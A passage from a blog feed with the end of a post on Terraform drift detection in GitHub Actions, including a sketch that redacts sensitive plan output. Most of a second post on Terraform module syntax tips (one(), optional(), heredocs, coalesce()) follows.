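  plan_status=${PIPESTATUS[0]}
  echo "plan exit code: $plan_status"
}

capture_plan_status
</code></pre></div></div>

<p>The last line it prints is <code class="language-plaintext highlighter-rouge">plan exit code: 2</code>, even though <code class="language-plaintext highlighter-rouge">sed</code> itself exited cleanly. <code class="language-plaintext highlighter-rouge">PIPESTATUS</code> is a bash feature, which is why the workflow step sets <code class="language-plaintext highlighter-rouge">shell: bash</code> explicitly.</p>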

<h3 id="creating-and-updating-github-issues">Creating and Updating GitHub Issues</h3>

<p>When drift is detected (exit code 2), this step uses the GitHub API via <code class="language-plaintext highlighter-rouge">actions/github-script</code> to create trackable issues. It reads the plan output, searches for existing open issues for the specific directory, and either updates the existing issue with a new comment or creates a fresh issue with appropriate labels. This ensures each Terraform directory has a single tracking issue that accumulates drift detections over time, providing an audit trail and preventing issue spam.</p>

<p><strong>Security Note:</strong> Terraform plan output may contain sensitive information such as resource IDs, internal IP addresses, or computed values. If your repository is public or your plan output includes sensitive data, consider implementing sanitization logic before creating issues, or restrict this workflow to private repositories with limited access. You may also want to use GitHub Actions secrets masking or filter the plan output to redact sensitive patterns.</p>

<div class="language-yaml highlighter-rouge"><div class="highlight"><pre class="highlight"><code>      <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Create or Update Issue on Drift Detection</span>
        <span class="na">if</span><span class="pi">:</span> <span class="s">steps.plan.outputs.drift_detected == 'true'</span>
        <span class="na">uses</span><span class="pi">:</span> <span class="s">actions/github-script@v7.0.1</span>
        <span class="na">with</span><span class="pi">:</span>
          <span class="na">script</span><span class="pi">:</span> <span class="pi">|</span>
            <span class="s">const fs = require('fs');</span>
            <span class="s">const path = require('path');</span>
            <span class="s">let planOutput = '';</span>
            <span class="s">try {</span>
              <span class="s">planOutput = fs.readFileSync(path.join('${{ matrix.tf_dir }}', 'plan_output.txt'), 'utf8');</span>
            <span class="s">} catch (error) {</span>
              <span class="s">planOutput = 'Could not read plan output';</span>
            <span class="s">}</span>

            <span class="s">const title = `Terraform Drift Detected: ${{ matrix.tf_dir }}`;</span>
            <span class="s">const driftBody = `## Terraform Drift Detected</span>
            <span class="s">**Directory:** \`${{ matrix.tf_dir }}\`</span>
            <span class="s">**Detection Time:** ${new Date().toISOString()}</span>
            <span class="s">**Workflow:** [${context.runId}](${context.payload.repository.html_url}/actions/runs/${context.runId})</span>
            <span class="s">&lt;details&gt;</span>
            <span class="s">&lt;summary&gt;Plan Output&lt;/summary&gt;</span>

            <span class="s">\`\`\`</span>
            <span class="s">${planOutput}</span>
            <span class="s">\`\`\`</span>

            <span class="s">&lt;/details&gt;</span>
            <span class="s">Please review the changes and determine if they should be applied or if the Terraform configuration needs to be updated.`;</span>

            <span class="s">// Search for existing open drift issue for this directory</span>
            <span class="s">const issues = await github.rest.issues.listForRepo({</span>
              <span class="s">owner: context.repo.owner,</span>
              <span class="s">repo: context.repo.repo,</span>
              <span class="s">state: 'open',</span>
              <span class="s">labels: ['drift-detection']</span>
            <span class="s">});</span>

            <span class="s">const existingIssue = issues.data.find(issue =&gt;</span>
              <span class="s">issue.title.includes('Terraform Drift Detected') &amp;&amp;</span>
              <span class="s">issue.title.includes('${{ matrix.tf_dir }}')</span>
            <span class="s">);</span>

            <span class="s">if (existingIssue) {</span>
              <span class="s">// Update existing issue with new drift info</span>
              <span class="s">await github.rest.issues.createComment({</span>
                <span class="s">owner: context.repo.owner,</span>
                <span class="s">repo: context.repo.repo,</span>
                <span class="s">issue_number: existingIssue.number,</span>
                <span class="s">body: `## New Drift Detected\n\n${driftBody}`</span>
              <span class="s">});</span>

              <span class="s">console.log(`Updated existing issue #${existingIssue.number}`);</span>
            <span class="s">} else {</span>
              <span class="s">// Create new issue</span>
              <span class="s">const newIssue = await github.rest.issues.create({</span>
                <span class="s">owner: context.repo.owner,</span>
                <span class="s">repo: context.repo.repo,</span>
                <span class="s">title: title,</span>
                <span class="s">body: driftBody,</span>
                <span class="s">labels: ['terraform', 'drift-detection', 'needs-review']</span>
              <span class="s">});</span>

              <span class="s">console.log(`Created new issue #${newIssue.data.number}`);</span>
            <span class="s">}</span>
</code></pre></div></div>

<h2 id="key-benefits">Key Benefits</h2>

<p>This approach provides several engineering advantages:</p>

<ul>
  <li><strong>Zero External Dependencies</strong>: No third-party SaaS tools or agents required</li>
  <li><strong>Native Exit Code Logic</strong>: Leverages Terraform’s <code class="language-plaintext highlighter-rouge">-detailed-exitcode</code> flag for precise drift detection</li>
  <li><strong>Parallel Execution</strong>: Matrix strategy enables concurrent checks across multiple environments</li>
  <li><strong>Audit Trail</strong>: GitHub issues provide timestamped drift history and workflow run links</li>
  <li><strong>Secure Authentication</strong>: OIDC eliminates static credential management</li>
  <li><strong>Cost Effective</strong>: Runs on GitHub Actions free tier for small to medium usage (note that larger deployments with many Terraform directories may exceed free tier limits)</li>
</ul>

<p>The workflow scales horizontally as you add Terraform directories and provides immediate visibility into infrastructure changes through your existing issue tracking system.</p>

<h2 id="considerations-for-production-use">Considerations for Production Use</h2>

<p>While this workflow provides solid drift detection, you may want to enhance it for production environments:</p>

<ul>
  <li><strong>Multi-Account Support</strong>: This example uses a single AWS role. For multi-account setups, consider using a matrix strategy with account-specific roles or dynamic role selection based on directory structure</li>
  <li><strong>Sensitive Data Handling</strong>: Implement plan output sanitization if your infrastructure includes secrets or sensitive configuration</li>
  <li><strong>Issue Lifecycle Management</strong>: Add automation to close issues when drift is resolved or implement a reconciliation step to verify fixes</li>
  <li><strong>State Lock Handling</strong>: The <code class="language-plaintext highlighter-rouge">-lock-timeout=5m</code> provides basic protection, but consider monitoring for persistent lock issues that may indicate state corruption or concurrent modifications</li>
  <li><strong>Error Notification</strong>: Consider adding Slack/email notifications for plan failures in addition to GitHub issues</li>
</ul>
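
<p>For the sensitive data item above, even a coarse filter is better than posting raw plan output. The sketch below redacts IPv4 addresses and 12-digit AWS account IDs. The function name and the placeholder strings are mine, and the patterns are deliberately blunt, so treat it as a starting point rather than a complete sanitizer.</p>

<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#!/usr/bin/env bash
# Sketch: redact a few obviously sensitive patterns from plan output on stdin.
redact_plan() {
  sed -E \
    -e 's/([0-9]{1,3}\.){3}[0-9]{1,3}/[REDACTED_IP]/g' \
    -e 's/(^|[^0-9])[0-9]{12}([^0-9]|$)/\1[REDACTED_ACCOUNT_ID]\2/g'
  # First rule: anything shaped like a dotted-quad IPv4 address.
  # Second rule: a standalone run of exactly 12 digits, such as the account ID in an ARN.
}
</code></pre></div></div>

<p>In the plan step, it would slot in after the existing <code class="language-plaintext highlighter-rouge">sed</code> filter, for example <code class="language-plaintext highlighter-rouge">... | sed -n '...' | redact_plan &gt; plan_output.txt</code>. Terraform stays first in the pipeline, so <code class="language-plaintext highlighter-rouge">${PIPESTATUS[0]}</code> still holds its exit code.</p>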

<hr />

<p>If you liked (or hated) this blog, feel free to check out my <a href="https://github.com/R0seSecurity">GitHub</a>!</p>]]></content><author><name></name></author><category term="terraform" /><category term="iac" /><category term="infrastructure" /><category term="devops" /><category term="engineering" /><summary type="html"><![CDATA[TL;DR Build a _zero-cost_ drift detection system using GitHub Actions and Terraform's native exit codes. This workflow automatically discovers all Terraform root modules, runs daily drift checks, and creates GitHub issues when changes are detected.]]></summary></entry><entry><title type="html">Terraform Tips from the IaC Trenches</title><link href="https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks.html" rel="alternate" type="text/html" title="Terraform Tips from the IaC Trenches" /><published>2025-12-04T00:00:00+00:00</published><updated>2025-12-04T00:00:00+00:00</updated><id>https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks</id><content type="html" xml:base="https://rosesecurity.cloud/2025/12/04/terraform-tips-and-tricks.html"><![CDATA[<p>After a few years of writing open-source Terraform modules, I’ve picked up a few syntax tricks that make code safer, cleaner, and easier to maintain. These aren’t revolutionary, but they’re simple patterns that prevent common mistakes and make the infrastructure more resilient. Based on the configurations I’ve seen in the wild, these techniques seem to be underutilized.</p>

<hr />

<h2 id="use-one-for-safer-conditional-resource-references">Use <code class="language-plaintext highlighter-rouge">one()</code> for Safer Conditional Resource References</h2>

<p>When you conditionally create resources with <code class="language-plaintext highlighter-rouge">count</code>, don’t reach for <code class="language-plaintext highlighter-rouge">[0]</code>; use <code class="language-plaintext highlighter-rouge">one()</code> instead.</p>

<h3 id="the-problem">The Problem</h3>

<p>It’s common to use <code class="language-plaintext highlighter-rouge">count</code> with a boolean to conditionally create resources (especially in open-source modules that accommodate a lot of different configuration settings):</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_route53_zone"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">create_dns</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">name</span>  <span class="o">=</span> <span class="s2">"rosesecurity.dev"</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">data</span><span class="p">.</span><span class="nx">aws_route53_zone</span><span class="p">.</span><span class="nx">this</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="nx">zone_id</span>  <span class="c1"># ❌ Dangerous</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"blog.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"A"</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This looks fine and might even work in <code class="language-plaintext highlighter-rouge">dev</code> environments where <code class="language-plaintext highlighter-rouge">var.create_dns = true</code>. But the moment that variable is <code class="language-plaintext highlighter-rouge">false</code> in another environment, you get:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Error: Invalid index

The given key does not identify an element in this collection value:
the collection value is an empty tuple.
</code></pre></div></div>

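<p>The issue? <strong>This only fails when Terraform evaluates the index against an empty collection, so it slips through every environment where the flag is <code class="language-plaintext highlighter-rouge">true</code>.</strong> The code works when the resource exists and breaks when it doesn’t.</p>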

<h3 id="the-solution">The Solution</h3>

<p>Use <code class="language-plaintext highlighter-rouge">one()</code> with the <code class="language-plaintext highlighter-rouge">[*]</code> splat operator:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">data</span> <span class="s2">"aws_route53_zone"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">count</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">create_dns</span> <span class="o">?</span> <span class="mi">1</span> <span class="o">:</span> <span class="mi">0</span>
  <span class="nx">name</span>  <span class="o">=</span> <span class="s2">"rosesecurity.dev"</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"this"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">one</span><span class="p">(</span><span class="nx">data</span><span class="p">.</span><span class="nx">aws_route53_zone</span><span class="p">.</span><span class="nx">this</span><span class="p">[*].</span><span class="nx">zone_id</span><span class="p">)</span>  <span class="c1"># ✅ Safe(r)</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"blog.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"A"</span>
  <span class="c1"># ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">one()</code> function (available in Terraform v0.15+) is designed for this exact pattern:</p>

<ul>
  <li><strong>If count = 0</strong>: Returns <code class="language-plaintext highlighter-rouge">null</code> gracefully instead of crashing</li>
  <li><strong>If count = 1</strong>: Returns the element’s value</li>
  <li><strong>If count ≥ 2</strong>: Returns an error (catches your mistake early)</li>
</ul>

<p><strong>When you use <code class="language-plaintext highlighter-rouge">[0]</code>, you’re assuming the resource exists. When you use <code class="language-plaintext highlighter-rouge">one()</code>, you’re handling the case where it doesn’t.</strong></p>

<p>Bonus: <code class="language-plaintext highlighter-rouge">one()</code> also works with sets, which don’t support index notation at all. Using <code class="language-plaintext highlighter-rouge">one()</code> makes the code more versatile and future-proof.</p>

<hr />

<h2 id="design-better-module-variables-with-objects-optional-and-coalesce">Design Better Module Variables with Objects, <code class="language-plaintext highlighter-rouge">optional()</code>, and <code class="language-plaintext highlighter-rouge">coalesce()</code></h2>

<p>When building reusable Terraform modules, variable design makes the difference between a module that’s fun to use and one that’s a configuration nightmare. Here’s a pattern that combines several Terraform features to create flexible, well-documented, and maintainable module interfaces.</p>

<h3 id="the-problem-scattered-variables">The Problem: Scattered Variables</h3>

<p>Most modules start simple and grow organically, leading to an explosion of individual variables:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ❌ Scattered variables - hard to manage and document</span>
<span class="nx">variable</span> <span class="s2">"elasticsearch_subdomain_name"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">string</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the subdomain for Elasticsearch"</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"elasticsearch_port"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">number</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Port for Elasticsearch"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="mi">9200</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"elasticsearch_enable_ssl"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable SSL for Elasticsearch"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_subdomain_name"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">string</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"The name of the subdomain for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">null</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_port"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">number</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Port for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="mi">5601</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_enable_ssl"</span> <span class="p">{</span>
  <span class="nx">type</span>        <span class="o">=</span> <span class="nx">bool</span>
  <span class="nx">description</span> <span class="o">=</span> <span class="s2">"Enable SSL for Kibana"</span>
  <span class="nx">default</span>     <span class="o">=</span> <span class="kc">true</span>
<span class="p">}</span>

<span class="c1"># ... and on and on for 12+ more variables</span>
</code></pre></div></div>

<p>This gets unwieldy fast. Users have to understand which variables are related, documentation becomes repetitive, and adding a new service means adding another set of scattered variables.</p>

<h3 id="the-solution-group-related-variables-into-objects">The Solution: Group Related Variables into Objects</h3>

<p>Use objects with the <code class="language-plaintext highlighter-rouge">optional()</code> function to group logically related settings:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># ✅ Grouped by logical component</span>
<span class="nx">variable</span> <span class="s2">"elasticsearch_settings"</span> <span class="p">{</span>
  <span class="nx">type</span> <span class="o">=</span> <span class="nx">object</span><span class="p">({</span>
    <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span>
    <span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">number</span><span class="p">,</span> <span class="mi">9200</span><span class="p">)</span>
    <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">bool</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
  <span class="p">})</span>

  <span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
    <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">service</span><span class="err">.</span>

    <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">in</span> <span class="nx">the</span> <span class="nx">DNS</span> <span class="nx">zone</span> <span class="err">(</span><span class="nx">e</span><span class="err">.</span><span class="nx">g</span><span class="p">.,</span> <span class="s1">'elasticsearch'</span><span class="p">,</span> <span class="s1">'search'</span><span class="p">).</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="nx">environment</span> <span class="nx">name</span><span class="p">.</span>
    <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="p">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">9200</span><span class="p">.</span>
    <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="p">.</span>
  <span class="nx">DOC</span>
  <span class="nx">default</span> <span class="o">=</span> <span class="p">{}</span>
<span class="p">}</span>

<span class="nx">variable</span> <span class="s2">"kibana_settings"</span> <span class="p">{</span>
  <span class="nx">type</span> <span class="o">=</span> <span class="nx">object</span><span class="p">({</span>
    <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">string</span><span class="p">)</span>
    <span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">number</span><span class="p">,</span> <span class="mi">5601</span><span class="p">)</span>
    <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="p">(</span><span class="nx">bool</span><span class="p">,</span> <span class="kc">true</span><span class="p">)</span>
  <span class="p">})</span>

  <span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
    <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Kibana</span> <span class="nx">service</span><span class="err">.</span>

    <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Kibana</span> <span class="nx">in</span> <span class="nx">the</span> <span class="nx">DNS</span> <span class="nx">zone</span> <span class="err">(</span><span class="nx">e</span><span class="err">.</span><span class="nx">g</span><span class="p">.,</span> <span class="s1">'kibana'</span><span class="p">,</span> <span class="s1">'ui'</span><span class="p">).</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="nx">environment</span> <span class="nx">name</span><span class="p">.</span>
    <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Kibana</span><span class="p">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">5601</span><span class="p">.</span>
    <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span> <span class="nx">for</span> <span class="nx">Kibana</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="p">.</span>
  <span class="nx">DOC</span>
  <span class="nx">default</span> <span class="o">=</span> <span class="p">{}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">optional()</code> function (Terraform v1.3+) lets you define object attributes that users can omit:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">subdomain_name</span> <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">string</span><span class="err">)</span>        <span class="c1"># Can be omitted, defaults to null</span>
<span class="nx">port</span>           <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">number</span><span class="err">,</span> <span class="mi">9200</span><span class="err">)</span>  <span class="c1"># Can be omitted, defaults to 9200</span>
<span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="nx">optional</span><span class="err">(</span><span class="nx">bool</span><span class="err">,</span> <span class="kc">true</span><span class="err">)</span>    <span class="c1"># Can be omitted, defaults to true</span>
</code></pre></div></div>

<p>This means users can provide as much or as little configuration as they need:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Minimal - just override subdomain</span>
<span class="nx">elasticsearch_settings</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"search"</span>
  <span class="c1"># port and enable_ssl use defaults</span>
<span class="p">}</span>

<span class="c1"># Or provide nothing, use all defaults</span>
<span class="nx">elasticsearch_settings</span> <span class="o">=</span> <span class="p">{}</span>

<span class="c1"># Or customize everything</span>
<span class="nx">elasticsearch_settings</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"es-prod"</span>
  <span class="nx">port</span>           <span class="o">=</span> <span class="mi">9300</span>
  <span class="nx">enable_ssl</span>     <span class="o">=</span> <span class="kc">false</span>
<span class="p">}</span>
</code></pre></div></div>
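
<p>For a sense of how this looks from the caller’s side, here is a rough sketch of a module call. The module name and <code class="language-plaintext highlighter-rouge">source</code> path are assumptions for illustration; only the two variable names come from the definitions above:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Hypothetical module call; the name and source path are assumptions
module "search_stack" {
  source = "./modules/search-stack"

  elasticsearch_settings = {
    subdomain_name = "search"
  }

  # kibana_settings is omitted, so the variable's default of {} applies
}

# Inside the module, the optional() defaults are already filled in:
#   var.elasticsearch_settings.port       -&gt; 9200
#   var.elasticsearch_settings.enable_ssl -&gt; true
#   var.kibana_settings.subdomain_name    -&gt; null
#   var.kibana_settings.port              -&gt; 5601
</code></pre></div></div>

<p>The module body never has to check whether an attribute was supplied. It reads the attribute and gets either the caller’s value or the declared default.</p>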

<h3 id="heredoc-syntax-for-documentation">HEREDOC Syntax for Documentation</h3>

<p>Use <strong>indented HEREDOC</strong> (<code class="language-plaintext highlighter-rouge">&lt;&lt;-DOC</code>) to document complex object variables:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">description</span> <span class="o">=</span> <span class="o">&lt;&lt;-</span><span class="nx">DOC</span>
  <span class="nx">Configuration</span> <span class="nx">settings</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">service</span><span class="err">.</span>

  <span class="nx">subdomain_name</span><span class="o">:</span> <span class="nx">The</span> <span class="nx">name</span> <span class="nx">of</span> <span class="nx">the</span> <span class="nx">subdomain</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span> <span class="nx">in</span> <span class="nx">DNS</span><span class="err">.</span>
  <span class="nx">port</span><span class="o">:</span> <span class="nx">Port</span> <span class="nx">number</span> <span class="nx">for</span> <span class="nx">Elasticsearch</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="mi">9200</span><span class="err">.</span>
  <span class="nx">enable_ssl</span><span class="o">:</span> <span class="nx">Enable</span> <span class="nx">SSL</span><span class="o">/</span><span class="nx">TLS</span><span class="err">.</span> <span class="nx">Defaults</span> <span class="nx">to</span> <span class="kc">true</span><span class="err">.</span>
<span class="nx">DOC</span>
</code></pre></div></div>

<p><strong>Why the dash matters:</strong></p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">&lt;&lt;-DOC</code> (with dash): Automatically strips leading whitespace, allowing proper indentation</li>
  <li><code class="language-plaintext highlighter-rouge">&lt;&lt;DOC</code> (without dash): Preserves all whitespace, breaking terraform-docs parsing and formatting</li>
</ul>

<p>The indented version plays nicely with automatic documentation generators like terraform-docs, producing clean, readable output in your README.</p>
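
<p>A small side-by-side sketch of the two forms, using hypothetical locals rather than a real variable description. The closing marker of the standard heredoc sits at column zero to keep the example unambiguous:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Hypothetical locals, purely illustrative
locals {
  # Indented heredoc: the four spaces shared by both lines are stripped,
  # so each line of the result starts with no leading whitespace.
  trimmed = &lt;&lt;-DOC
    port: Port number for the service.
    enable_ssl: Enable SSL/TLS.
  DOC

  # Standard heredoc: the four leading spaces on each line are kept
  # as part of the string.
  preserved = &lt;&lt;DOC
    port: Port number for the service.
    enable_ssl: Enable SSL/TLS.
DOC
}
</code></pre></div></div>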

<h3 id="smart-defaults-with-coalesce-and-context">Smart Defaults with <code class="language-plaintext highlighter-rouge">coalesce()</code> and Context</h3>

<p>Combine objects with the <a href="https://github.com/cloudposse/terraform-null-label">Terraform null label pattern</a> (context.tf) to provide intelligent defaults:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Use locals to apply coalesce logic</span>
<span class="nx">locals</span> <span class="p">{</span>
  <span class="nx">elasticsearch_subdomain</span> <span class="o">=</span> <span class="nx">coalesce</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">elasticsearch_settings</span><span class="p">.</span><span class="nx">subdomain_name</span><span class="p">,</span> <span class="nx">module</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">environment</span><span class="p">)</span>
  <span class="nx">kibana_subdomain</span>        <span class="o">=</span> <span class="nx">coalesce</span><span class="p">(</span><span class="nx">var</span><span class="p">.</span><span class="nx">kibana_settings</span><span class="p">.</span><span class="nx">subdomain_name</span><span class="p">,</span> <span class="nx">module</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">environment</span><span class="p">)</span>
<span class="p">}</span>

<span class="c1"># Resources reference the locals</span>
<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"elasticsearch"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">zone_id</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"${local.elasticsearch_subdomain}.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"CNAME"</span>
  <span class="nx">records</span> <span class="o">=</span> <span class="p">[</span><span class="nx">aws_elasticsearch_domain</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">endpoint</span><span class="p">]</span>
  <span class="nx">ttl</span>     <span class="o">=</span> <span class="mi">300</span>
<span class="p">}</span>

<span class="nx">resource</span> <span class="s2">"aws_route53_record"</span> <span class="s2">"kibana"</span> <span class="p">{</span>
  <span class="nx">zone_id</span> <span class="o">=</span> <span class="nx">var</span><span class="p">.</span><span class="nx">zone_id</span>
  <span class="nx">name</span>    <span class="o">=</span> <span class="s2">"${local.kibana_subdomain}.rosesecurity.dev"</span>
  <span class="nx">type</span>    <span class="o">=</span> <span class="s2">"CNAME"</span>
  <span class="nx">records</span> <span class="o">=</span> <span class="p">[</span><span class="nx">aws_elasticsearch_domain</span><span class="p">.</span><span class="nx">this</span><span class="p">.</span><span class="nx">kibana_endpoint</span><span class="p">]</span>
  <span class="nx">ttl</span>     <span class="o">=</span> <span class="mi">300</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">coalesce()</code> function returns the first non-null value, giving you:</p>

<p><strong>Without user input</strong> (in “prod” environment), both locals fall back to the environment name:</p>
<ul>
  <li>Elasticsearch record: <code class="language-plaintext highlighter-rouge">prod.rosesecurity.dev</code></li>
  <li>Kibana record: <code class="language-plaintext highlighter-rouge">prod.rosesecurity.dev</code></li>
</ul>

<p>Because both records share the same fallback name, at least one service needs an explicit <code class="language-plaintext highlighter-rouge">subdomain_name</code> when both live in the same zone.</p>

<p><strong>With user override:</strong></p>
<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nx">elasticsearch_settings</span> <span class="o">=</span> <span class="p">{</span>
  <span class="nx">subdomain_name</span> <span class="o">=</span> <span class="s2">"search"</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Results in: <code class="language-plaintext highlighter-rouge">search.rosesecurity.dev</code></p>

<p><strong>Let users configure only what matters, default the rest.</strong></p>

<p>Group related variables into objects, use <code class="language-plaintext highlighter-rouge">optional()</code> for flexibility, document with indented HEREDOCs, and combine with <code class="language-plaintext highlighter-rouge">coalesce()</code> for intelligent defaults. Your module users will thank you.</p>
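
<p>One detail of <code class="language-plaintext highlighter-rouge">coalesce()</code> is worth knowing before leaning on it: it skips empty strings as well as <code class="language-plaintext highlighter-rouge">null</code>. A minimal sketch with hypothetical locals, where the literal <code class="language-plaintext highlighter-rouge">"prod"</code> stands in for <code class="language-plaintext highlighter-rouge">module.this.environment</code>:</p>

<div class="language-hcl highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Hypothetical locals; "prod" stands in for module.this.environment
locals {
  from_null     = coalesce(null, "prod")      # "prod"
  from_empty    = coalesce("", "prod")        # "prod" (empty strings are skipped too)
  from_override = coalesce("search", "prod")  # "search"
}
</code></pre></div></div>

<p>Since <code class="language-plaintext highlighter-rouge">coalesce()</code> raises an error when every argument is null or empty, the last argument should be a value that is always set.</p>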

<hr />

<h2 id="avoid-double-negatives-in-variable-names">Avoid Double Negatives in Variable Names</h2>

